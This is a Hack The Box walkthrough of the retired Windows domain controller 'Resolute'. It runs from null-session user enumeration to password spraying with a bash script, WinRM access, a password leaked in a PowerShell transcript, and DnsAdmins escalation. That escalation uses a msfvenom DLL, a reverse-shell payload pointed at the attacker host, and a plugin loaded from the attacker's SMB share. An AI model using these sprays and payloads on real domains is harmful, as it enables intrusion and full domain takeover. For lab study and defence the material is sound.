Hack The Box retired Resolute this week. This machine is rated medium and was released in December 2019.
Root looks to be considerably harder than user on this one. Let's see what we can find.
Reconnaissance
To start things off I run an nmap scan with default scripts and version detection, saving output in all formats, maxing the verbosity, and scanning all TCP ports.
kali@kali:~$ nmap -sC -sV -oA simple -vvv -p- 10.10.10.169
Nmap scan report for resolute.megabank.local (10.10.10.169)
Host is up, received conn-refused (0.062s latency).
Scanned at 2020-05-29 13:42:07 EDT for 5739s
Not shown: 65509 closed ports
Reason: 65509 conn-refused
PORT      STATE SERVICE      REASON  VERSION
53/tcp    open  domain?      syn-ack
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2020-05-29 19:25:37Z)
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?    syn-ack
593/tcp   open  ncacn_http   syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack
3268/tcp  open  ldap         syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       syn-ack .NET Message Framing
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack Microsoft Windows RPC
49670/tcp open  msrpc        syn-ack Microsoft Windows RPC
49676/tcp open  ncacn_http   syn-ack Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        syn-ack Microsoft Windows RPC
49688/tcp open  msrpc        syn-ack Microsoft Windows RPC
49709/tcp open  msrpc        syn-ack Microsoft Windows RPC
50537/tcp open  tcpwrapped   syn-ack
51117/tcp open  tcpwrapped   syn-ack
52808/tcp open  tcpwrapped   syn-ack
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/29%Time=5ED15F27%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m55s, deviation: 4h02m30s, median: 10m54s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 41231/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52471/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 55070/udp): CLEAN (Failed to receive data)
|   Check 4 (port 26625/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-05-29T12:26:29-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-05-29T19:26:31
|_  start_date: 2020-05-29T17:42:56
This is clearly a Windows domain controller: DNS (53), Kerberos (88), LDAP and the global catalog (389/636/3268/3269), plus the domain name megabank.local in the LDAP banners. WinRM (5985) is open too, which will matter later. Note that SMB signing is required, so NTLM relay is off the table. I personally start with SMB whenever 445 is open on a Windows box. Let's enumerate a bit more with "enumdomusers" over a null session in rpcclient.
kali@kali:~$ rpcclient -U "" -N 10.10.10.169
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
rpcclient $>
Here we have a list of all the domain users, obtained without any credentials at all. Since there are so few of them we can simply run "queryuser" on each one from the rpcclient console and see what turns up in the account attributes (the description field is a classic place for leaked passwords).
rpcclient $> queryuser marko
        User Name   :   marko
        Full Name   :   Marko Novak
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Account created. Password set to Welcome123!
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Wed, 31 Dec 1969 19:00:00 EST
        Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST
        Kickoff Time             :      Wed, 13 Sep 30828 22:48:05 EDT
        Password last set Time   :      Fri, 27 Sep 2019 09:17:15 EDT
        Password can change Time :      Sat, 28 Sep 2019 09:17:15 EDT
        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT
        unknown_2[0..31]...
        user_rid :      0x457
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...
Here we see an interesting description on Mr. Novak's account:

Account: marko
Name: Marko Novak
Desc: Account created. Password set to Welcome123!
kali@kali:~$ rpcclient -U "marko%Welcome123!" -c "getusername;quit" 10.10.10.169
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

No luck logging in as Marko; his password has evidently been changed since the account was created. The description reads like an onboarding template, though, so the same initial password may still be set on other accounts.
Weaponization and Delivery
I wrote up a quick bash script to spray the password from Marko's description across every user we know exists.
kali@kali:~/tools$ mkdir passspray
kali@kali:~/tools$ cd passspray/
kali@kali:~/tools/passspray$ sudo vi passsprayv2.sh
#!/bin/bash
# passsprayv2.sh: try one password against every account in users.txt
# (one sAMAccountName per line, taken from the enumdomusers output above).
while read u; do
    # print the user, then rpcclient's result: either "Account Name: ..." on
    # success or NT_STATUS_LOGON_FAILURE on a bad credential
    echo -n "$u" && rpcclient -U "$u%Welcome123!" -c "getusername;quit" 10.10.10.169
done <users.txt
The script reads users.txt line by line, storing each line in the variable "u". For each user it runs rpcclient with "-U <user>%Welcome123!", so "$u" is replaced by the current name and the candidate password follows the "%". The "getusername" command prints the authenticated account name when the logon succeeds (and rpcclient prints NT_STATUS_LOGON_FAILURE when it does not), "quit" then closes the session, and 10.10.10.169 is the target. Before spraying a real domain, check the account lockout threshold first (for example with enum4linux -P, or from the domain_policy output of ldapdomaindump once you have credentials): one password per user, as here, is safe against any sane policy, but repeated rounds are not.
kali@kali:~/tools/passspray$ ./passsprayv2.sh
AdministratorCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
GuestCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
krbtgtCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
DefaultAccountCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
ryanCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
markoCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
sunitaCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
abigailCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
marcusCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
sallyCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
fredCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
angelaCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
feliciaCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
gustavoCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
ulfCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
stevieCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
claireCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
pauloCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
steveCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
annetteCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
annikaCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
perCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
claudeCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
melanieAccount Name: melanie, Authority Name: MEGABANK
zachCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
simonCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
naokiCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Success! We have a hit on user Melanie: her account still carries the onboarding password Welcome123!.
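The same spray as a reusable script, added here as an example rather than the write-up's own passsprayv2.sh: it builds the user list directly from the rpcclient "enumdomusers" output (so there is no hand-edited users.txt), reports one clean OK/FAIL line per account, and pauses between attempts so a run can be paced under a lockout threshold. The RPCCLIENT and SPRAY_DELAY variables, the function names and the shortened sample of enumdomusers output are assumptions made for this example; rpcclient itself is the real Samba tool used on the page.

```shell
#!/usr/bin/env bash
# Added example (not the original write-up's script): derive the account list
# from rpcclient "enumdomusers" output and spray one password across it.
# Assumed for this example: rpcclient on PATH; RPCCLIENT (command to use in
# place of rpcclient) and SPRAY_DELAY (seconds between attempts) are knobs
# invented here.

# Constructed, shortened sample of enumdomusers output (format is real).
SAMPLE_ENUM='user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[marko] rid:[0x457]
user:[melanie] rid:[0x2775]'

# extract_users: read enumdomusers output on stdin, print one account per line.
# Each line looks like "user:[name] rid:[0x...]"; keep only what is inside user:[...].
extract_users() {
    sed -n 's/^user:\[\([^]]*\)\].*/\1/p'
}

# try_login USER PASS TARGET: exit 0 when rpcclient can bind with USER%PASS.
# The session only runs "getusername" and quits, so a hit leaves little trace.
try_login() {
    local user=$1 pass=$2 target=$3
    "${RPCCLIENT:-rpcclient}" -U "${user}%${pass}" -c 'getusername;quit' "$target" >/dev/null 2>&1
}

# spray PASS TARGET < users: one "<user> OK" or "<user> FAIL" line per account,
# sleeping SPRAY_DELAY seconds (default 0) between attempts. One password per
# user per round keeps every account at a single bad-password count.
spray() {
    local pass=$1 target=$2 u
    while IFS= read -r u; do
        [ -n "$u" ] || continue
        if try_login "$u" "$pass" "$target"; then
            printf '%s OK\n' "$u"
        else
            printf '%s FAIL\n' "$u"
        fi
        sleep "${SPRAY_DELAY:-0}"
    done
}

# Stand-alone usage:  ./spray.sh users.txt 'Welcome123!' 10.10.10.169
# where users.txt comes from:
#   rpcclient -U "" -N 10.10.10.169 -c enumdomusers | ./spray.sh  (after sourcing extract_users)
# or simply:  rpcclient -U "" -N 10.10.10.169 -c enumdomusers | extract_users > users.txt
if [ "$#" -eq 3 ]; then
    spray "$2" "$3" < "$1"
fi
```

The sed pattern is deliberately anchored on "user:[" so stray rpcclient banner lines never end up in the user list, and the loop never tries more than one password per account per invocation; run it again with a second password only after the lockout observation window has passed.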
kali@kali:~/tools/passspray$ smbclient -U "melanie%Welcome123!" \\\\10.10.10.169\\SYSVOL
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep 25 09:28:21 2019
  ..                                  D        0  Wed Sep 25 09:28:21 2019
  megabank.local                      D        0  Wed Sep 25 09:28:21 2019

                10340607 blocks of size 4096. 7565420 blocks available
smb: \> cd megabank.local\
smb: \megabank.local\> ls
  .                                   D        0  Wed Sep 25 09:34:36 2019
  ..                                  D        0  Wed Sep 25 09:34:36 2019
  DfsrPrivate                       DHS        0  Wed Sep 25 09:34:36 2019
  Policies                            D        0  Wed Sep 25 09:28:32 2019
  scripts                             D        0  Wed Sep 25 09:28:21 2019

                10340607 blocks of size 4096. 7565164 blocks available
smb: \megabank.local\>
Nothing interesting in the shares. Let's take a step back and look more closely at this user. Kali ships with many good AD enumeration tools; let's try ldapdomaindump, which binds to LDAP with the credential and dumps users, groups, computers, trusts and the domain policy to HTML, JSON and grep-friendly files.
kali@kali:~/htb/resolute/domainenum$ ldapdomaindump -u "MEGABANK\melanie" -p "Welcome123!" 10.10.10.169
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
kali@kali:~/htb/resolute/domainenum$ ls
domain_computers_by_os.html  domain_computers.html  domain_groups.grep  domain_groups.json  domain_policy.html  domain_trusts.grep  domain_trusts.json  domain_users.grep  domain_users.json
domain_computers.grep        domain_computers.json  domain_groups.html  domain_policy.grep  domain_policy.json  domain_trusts.html  domain_users_by_group.html  domain_users.html
kali@kali:~/htb/resolute/domainenum$ cat domain_users.grep
cn  name  sAMAccountName  memberOf  primaryGroupId  whenCreated  whenChanged  lastLogon  userAccountControl  pwdLastSet  objectSid  description
Naoki Yamamoto    Naoki Yamamoto    naoki    (none)                   Domain Users  12/04/19 10:40:44  12/04/19 10:40:44  01/01/01 00:00:00  NORMAL_ACCOUNT  12/04/19 10:40:44  S-1-5-21-1392959593-3013219662-3596683436-10104
Simon Faraday     Simon Faraday     simon    (none)                   Domain Users  12/04/19 10:39:58  12/04/19 10:39:58  01/01/01 00:00:00  NORMAL_ACCOUNT  12/04/19 10:39:58  S-1-5-21-1392959593-3013219662-3596683436-10103
Zach Armstrong    Zach Armstrong    zach     (none)                   Domain Users  12/04/19 10:39:27  12/04/19 10:39:27  01/01/01 00:00:00  NORMAL_ACCOUNT  12/04/19 10:39:27  S-1-5-21-1392959593-3013219662-3596683436-10102
Melanie Purkis    Melanie Purkis    melanie  Remote Management Users  Domain Users  12/04/19 10:38:45  05/29/20 20:35:04  01/01/01 00:00:00  NORMAL_ACCOUNT  05/29/20 20:35:04  S-1-5-21-1392959593-3013219662-3596683436-10101
(output truncated to the relevant entries)
Melanie is a member of the "Remote Management Users" group. Let's see what that group is allowed to do.
kali@kali:~/htb/resolute/domainenum$ cat domain_groups.grep | grep "Remote Management"
Contractors              Contractors              DnsAdmins, Remote Management Users  Contractors  09/26/19 12:37:45  09/27/19 14:02:21  S-1-5-21-1392959593-3013219662-3596683436-1103
Remote Management Users  Remote Management Users  Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.  09/25/19 13:28:31  12/04/19 10:42:51  S-1-5-32-580
So WinRM (port 5985 from the scan) should be available to Melanie. Note the other hit too: the Contractors group is nested in both DnsAdmins and Remote Management Users, which will matter for privilege escalation.
Foothold
Evil-WinRM is basically the go-to Windows Remote Management client on Linux.
kali@kali:~/htb/resolute/domainenum$ evil-winrm -u melanie -p Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
Finally got a foothold!
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir

    Directory: C:\Users\melanie\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/3/2019   7:33 AM             32 user.txt

*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
0c3b...8540
After manually spot-checking the filesystem (including hidden directories, which a plain "dir" of C:\ does not show), I found an unusual directory called "PSTranscripts".
*Evil-WinRM* PS C:\> ls -hidden

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        5/29/2020  10:42 AM      402653184 pagefile.sys
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OjuoBGhU.20191203063201.txt
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
This is a PowerShell transcript: the "Turn on PowerShell Transcription" logging feature records every command a user runs, arguments included. Here it captured ryan mapping a backups share with "net use", and his password is sitting in the transcript in clear text: "Serv3r4Admin4cc123!". Transcription is a useful audit control, but the output directory has to be locked down; on this box a regular domain user could read another user's transcript. The credential works for ryan over WinRM, so we can switch to his session.
Privilege Escalation
Ryan is in the Contractors group, which the group dump showed is nested in DnsAdmins. DnsAdmins is the key: its members can reconfigure the DNS Server service through dnscmd, including pointing the ServerLevelPluginDll setting at an arbitrary DLL, and the DNS service on a domain controller runs as SYSTEM and loads that DLL the next time it starts. The escalation also needs the ability to stop and start the service, which ryan turns out to have on this box.
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
I first tried a reverse shell DLL, but the file was evidently being detected as malicious and deleted.
kali@kali:~/htb/resolute$ msfvenom -p windows/x64/shell_reverse_tcp -a x64 LHOST=10.10.14.44 LPORT=7788 -f dll > trenchesofit.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes
*Evil-WinRM* PS C:\Users\ryan\Documents> Invoke-WebRequest -Uri "http://10.10.14.44/trenchesofit.dll" -OutFile "C:\Users\ryan\Documents\trenchesofit.dll"
*Evil-WinRM* PS C:\Users\ryan\Documents> dir

    Directory: C:\Users\ryan\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/29/2020   6:09 PM           5120 trenchesofit.dll
The download landed, but as soon as I tried to do anything with it Windows Defender found the reverse shell DLL and removed it. I had to change approach. After some research I rebuilt the DLL with a much smaller msfvenom "exec" payload that simply adds a user to the Domain Admins group; since the DNS service runs as SYSTEM on the domain controller, the "net group" command runs with enough privilege to do that.
kali@kali:~/tools/impacket/examples$ msfvenom -p windows/x64/exec cmd='net group "domain admins" ryan /add /domain' --platform windows -f dll > /home/kali/htb/resolute/trenchesofit.dll
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 311 bytes
Final size of dll file: 5120 bytes
Rather than copy the DLL onto the box again, I started an SMB server on Kali so the DNS service could load it straight from a UNC path. dnscmd accepts a UNC path for the plugin DLL, so the payload never has to be written to the domain controller's disk, which sidesteps Defender's file scan.
kali@kali:~/tools/impacket/examples$ sudo python smbserver.py trenchesofitshare /home/kali/htb/resolute
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd RESOLUTE /config /serverlevelplugindll \\10.10.14.44\trenchesofitshare\trenchesofit.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
[SC] StartService FAILED 1056:

An instance of the service is already running.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2976
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
The first attempt targeted ryan in the "net group" command, and as the whoami output above shows, it did not take. I rebuilt the DLL with melanie as the target instead and that worked. Two things worth knowing about this technique: group membership is only reflected in a new logon token, so after the DNS service restarts you have to reconnect before the new group shows up, and the setting persists as the ServerLevelPluginDll value under the DNS service's Parameters key in the registry, so clear it and restart DNS once you are done, or the next service start will load the DLL again. After rerunning the dnscmd and service restart, I connected back with evil-winrm as melanie.
kali@kali:~/htb/resolute/domainenum$ evil-winrm -u melanie -p Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> whoami /all

USER INFORMATION
----------------

User Name        SID
================ ===============================================
megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101

GROUP INFORMATION
-----------------

Group Name                                      Type             SID                                           Attributes
=============================================== ================ ============================================= ===============================================================
Everyone                                        Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users                 Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                   Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access      Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                          Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                            Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                  Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
MEGABANK\Domain Admins                          Group            S-1-5-21-1392959593-3013219662-3596683436-512 Mandatory group, Enabled by default, Enabled group
MEGABANK\Denied RODC Password Replication Group Alias            S-1-5-21-1392959593-3013219662-3596683436-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication                Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level            Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
With "whoami /all" you can now see that Melanie is a Domain Admin, with a high-integrity token and the full administrator privilege set.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/3/2019   7:32 AM             32 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
e1d9....619c

Just grab the root flag from the usual location.
Overall, this was a fun box with a challenging privilege escalation method. I found a great resource on abusing "dnscmd" and the DNS plugin DLL, linked here.
If you enjoyed this write-up, please show your respect here: https://www.hackthebox.eu/home/users/profile/272340
Feel free to comment or reach out if you have any questions or issues with any of the above steps. Until next time, stay safe in the Trenches of IT!